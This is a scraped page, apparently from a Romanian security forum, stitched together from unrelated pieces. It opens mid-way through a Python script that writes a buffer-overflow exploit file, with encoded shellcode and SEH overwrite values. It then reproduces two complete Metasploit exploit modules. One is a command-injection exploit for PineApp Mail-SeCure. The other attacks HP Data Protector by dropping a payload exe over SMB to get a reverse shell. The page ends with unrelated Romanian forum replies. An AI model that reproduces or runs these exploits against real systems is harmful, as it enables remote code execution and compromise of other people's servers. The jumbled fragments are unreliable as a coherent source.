"\x4d\x4d\x4b\x4f\x4e\x35\x57\x4c\x55\x56\x53\x4c\x34\x4a\x4d" "\x50\x4b\x4b\x4d\x30\x32\x55\x33\x35\x4f\x4b\x51\x57\x52\x33" "\x32\x52\x32\x4f\x32\x4a\x43\x30\x31\x43\x4b\x4f\x39\x45\x35" "\x33\x45\x31\x42\x4c\x35\x33\x46\x4e\x42\x45\x33\x48\x42\x45" "\x33\x30\x41\x41" ) trailer = "\x90" * (2000 - len(junk + nseh + seh + padding + shellcode)) + "\"\n\n" buffer = header + junk + nseh + seh + padding + shellcode + trailer textfile = open("exploit.reg" , 'w') textfile.write(buffer) textfile.close() print "[*] Done"

Description : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## Author : metasploit Source : PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution Code : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient def initialize(info = {}) super(update_info(info, 'Name' => 'PineApp Mail-SeCure test_li_connection.php Arbitrary Command Execution', 'Description' => %q{ This module exploits a command injection vulnerability on PineApp Mail-SeCure 3.70. The vulnerability exists on the test_li_connection.php component, due to the insecure usage of the system() php function. This module has been tested successfully on PineApp Mail-SeCure 3.70. }, 'Author' => [ 'Dave Weinstein', # Vulnerability discovery 'juan vazquez' # Metasploit module ], 'License' => MSF_LICENSE, 'References' => [ [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-13-188/'] ], 'Platform' => ['unix'], 'Arch' => ARCH_CMD, 'Privileged' => false, 'Payload' => { 'Space' => 1024, 'DisableNops' => true, 'Compat' => { 'PayloadType' => 'cmd', 'RequiredCmd' => 'generic perl python telnet' } }, 'Targets' => [ [ 'PineApp Mail-SeCure 3.70', { }] ], 'DefaultOptions' => { 'SSL' => true }, 'DefaultTarget' => 0, 'DisclosureDate' => 'Jul 26 2013' )) register_options( [ Opt::RPORT(7443) ], self.class ) end def my_uri return normalize_uri("/admin/test_li_connection.php") end def get_cookies res = send_request_cgi({ 'uri' => my_uri, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to start the session 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1" # In order to make things as fast as possible } }) if res and res.code == 200 and res.headers.include?('Set-Cookie') and res.headers['Set-Cookie'] =~ /SESSIONID/ return res.get_cookies else return nil end end def check # Since atm of writing this exploit there isn't patch available, # checking for the vulnerable component should be a reliable test. cookies = get_cookies if cookies.nil? return Exploit::CheckCode::Safe end return Exploit::CheckCode::Appears end def exploit print_status("#{rhost}:#{rport} - Retrieving session cookie...") cookies = get_cookies if cookies.nil? fail_with(Exploit::Failure::Unknown, "Failed to retrieve the session cookie") end print_status("#{rhost}:#{rport} - Executing payload...") send_request_cgi({ 'uri' => my_uri, 'cookie' => cookies, 'vars_get' => { 'actiontest' =>'1', # must be 1 in order to trigger the vulnerability 'idtest' => rand_text_alpha(5 + rand(3)), 'iptest' => "127.0.0.1;#{payload.encoded}" } }) end end

Description : ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit # web site for more information on licensing and terms of use. # Penetration Testing Software | Metasploit ## # Exploit Title: HP Data Protector Client EXEC_CMD Remote Code Execution Vulnerability # Date: 2012-13-07 # Exploit Author: Ben Turner, Doug McLeod # Vendor Homepage: HP - United States | Laptop Computers, Desktops , Printers, Servers and more # Version: 6.10 & 6.11 & 6.20 # Tested on: Windows 2003 Server SP2 en # CVE: CVE-2011-0922 # Notes: ZDI-11-056 # Reference: Zero Day Initiative # Reference: HPSBMA02654 SSRT100441 rev.3 - HP OpenView Storage Data Protector, Remote Execution of Arbitrary Code - c02781143 - HP Business Support Center Author : Ben Turner Source : HP Data Protector CMD Install Service Vulnerability (msf) Code : require 'msf/core' class Metasploit3 < Msf::Exploit::Remote Rank = ExcellentRanking # Exploit mixins should be called first include Msf::Exploit::Remote::SMB include Msf::Exploit::EXE include Msf::Auxiliary::Report # Aliases for common classes SIMPLE = Rex::Proto::SMB::Client XCEPT = Rex::Proto::SMB::Exceptions CONST = Rex::Proto::SMB::Constants def initialize super( 'Name' => 'HP Data Protector CMD Install Service Vulnerability', 'Description' => %Q{ This module exploits HP Data Protector omniinet process on Windows only. This invokes the install service function that allows for a reverse tcp payload to your host. To ensure this works, the SMB server must have a share called Omniback which has a subfolder i386, i.e. \\\\192.168.1.1\\Omniback\\i386\\ }, 'Author' => [ 'Ben Turner', 'Doug McLeod' ], 'License' => BSD_LICENSE, 'References' => [ ], 'Privileged' => true, 'DefaultOptions' => { 'WfsDelay' => 10, 'EXITFUNC' => 'process' }, 'Payload' => { 'BadChars' => '', 'DisableNops' => true }, 'Platform' => ['win'], 'Targets' => [ [ 'HP Data Protector 6.10/6.11/6.20 on Windows', {}] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'July 29 2013' ) register_options([ OptString.new('SMBServer', [true, 'The IP address of the SMB server which hosts your share.', 'IPAddress']), Opt::RPORT(5555), ], self.class) end def exploit lhost = "#{datastore['SMBServer']}" lhostfull = "" lhost.each_char do |character| lhostfull = lhostfull << "\x00" << character end shellcode = "\x00\x00\x01\xbe\xff\xfe\x32\x00\x00\x00\x20" shellcode << lhostfull shellcode << "\x00\x00\x00\x20\x00\x30\x00" shellcode << "\x00\x00\x20\x00\x53\x00\x59\x00\x53\x00\x54\x00\x45\x00\x4d\x00" shellcode << "\x00\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x41\x00\x55\x00\x54\x00" shellcode << "\x48\x00\x4f\x00\x52\x00\x49\x00\x54\x00\x59\x00\x00\x00\x20\x00" shellcode << "\x43\x00\x00\x00\x20\x00\x32\x00\x36\x00\x00\x00\x20\x00\x5c\x00" shellcode << "\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00" shellcode << "\x61\x00\x63\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" shellcode << "\x5c\x00\x69\x00\x6e\x00\x73\x00\x74\x00\x61\x00\x6c\x00\x6c\x00" shellcode << "\x73\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x2e\x00" shellcode << "\x65\x00\x78\x00\x65\x00\x20\x00\x2d\x00\x73\x00\x6f\x00\x75\x00" shellcode << "\x72\x00\x63\x00\x65\x00\x20\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62" shellcode << "\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x5c\x00\x5c\x00\x4f\x00" shellcode << "\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63\x00\x6b\x00\x5c\x00" shellcode << "\x69\x00\x33\x00\x38\x00\x36\x00\x5c\x00\x69\x00\x6e\x00\x73\x00" shellcode << "\x74\x00\x61\x00\x6c\x00\x6c\x00\x73\x00\x65\x00\x72\x00\x76\x00" shellcode << "\x69\x00\x63\x00\x65\x00\x2e\x00\x65\x00\x78\x00\x65\x00\x20\x00" shellcode << "\x2d\x00\x73\x00\x6f\x00\x75\x00\x72\x00\x63\x00\x65\x00\x20\x00" shellcode << "\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x20\x00\x00\x00\x00\x00\x00\x00\x02\x54" shellcode << "\xff\xfe\x32\x00\x36\x00\x00\x00\x20\x00\x5b\x00\x30\x00\x5d\x00" shellcode << "\x41\x00\x44\x00\x44\x00\x2f\x00\x55\x00\x50\x00\x47\x00\x52\x00" shellcode << "\x41\x00\x44\x00\x45\x00\x0a\x00\x5c\x00\x5c" shellcode << lhostfull shellcode << "\x00\x5c\x00\x4f\x00\x6d\x00\x6e\x00\x69\x00\x62\x00\x61\x00\x63" shellcode << "\x00\x6b\x00\x5c\x00\x69\x00\x33\x00\x38\x00\x36\x00" def filedrop() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Generating payload, dropping here: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...") self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback") exe = generate_payload_exe fd = smb_open("\\i386\\installservice.exe", 'rwct') fd << exe fd.close self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end def filetest() begin origrport = self.datastore['RPORT'] self.datastore['RPORT'] = 445 origrhost = self.datastore['RHOST'] self.datastore['RHOST'] = self.datastore['SMBServer'] connect() smb_login() print_status("Checking the remote share for: \\\\#{datastore['SMBServer']}\\Omniback\\i386\\installservice.exe'...\n") self.simple.connect("\\\\#{datastore['SMBServer']}\\Omniback") file = "\\i386\\installservice.exe" filetest = smb_file_exist?(file) if filetest print_good(" Found, upload was succesful! \\\\#{datastore['SMBServer']}\\Omniback\\#{file}") else print_error("\\\\#{datastore['SMBServer']}\\Omniback\\#{file} - The file does not exist, try again!") end self.datastore['RPORT'] = origrport self.datastore['RHOST'] = origrhost rescue Rex::Proto::SMB::Exceptions::Error => e print_error("File did not exist, or could not connect to the SMB share: #{e}\n\n") abort() end end begin filedrop() filetest() connect() sock.put(shellcode) print_status("Waiting ...") print_good("Sent Good Luck") rescue ::Exception => e print_error("Could not connect to #{datastore['RHOST']}:#{datastore['RPORT']}\n\n") abort() end handler #disconnect end end

Sau shareimage.ro

Ce faci ma ? Unde te crezi aici ? Pe forumul tau de cantar straic si metin ? Ai facut 5 posturi cu gg gg gg bv gj . Mars la tine in ograda.

Foarte buna sugestia au aici topic vechi : https://rstforums.com/forum/24670-invitatii-filelist-invitatie-demonoid-invitatie-lasttorrents-invitatii-trackere.rst

Ieri de dimineata nu mi-a prea mers nici mie, cred ca a fost un DDoS ceva, dar astazi a mers ok.